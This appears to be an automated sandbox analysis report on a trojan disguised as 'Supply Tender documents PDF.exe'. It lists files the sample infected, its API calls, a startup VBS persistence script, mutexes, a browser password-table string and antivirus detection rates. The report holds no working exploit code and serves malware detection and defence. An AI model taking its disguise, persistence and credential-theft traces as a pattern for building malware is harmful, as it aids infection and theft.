Source: msedge_pwa_launcher.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Supply Tender documents PDF.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: mouslingly.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@30/156@79/20

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Jump to behavior

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

File created: C:\Users\user\AppData\Roaming\5a4aebfaf253d89c.bin

Jump to behavior

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-5a4aebfaf253d89c7d8e3ee9-b
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-5a4aebfaf253d89c9ea72c54-b
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-5a4aebfaf253d89c-inf

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

File created: C:\Users\user\AppData\Local\Temp\aut99BC.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mfpmp.exe, 00000018.00000003.1593082750.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2414107394.0000000002A08000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Supply Tender documents PDF.exe	Virustotal: Detection: 79%
Source: Supply Tender documents PDF.exe	ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

File read: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Supply Tender documents PDF.exe "C:\Users\user\Desktop\Supply Tender documents PDF.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
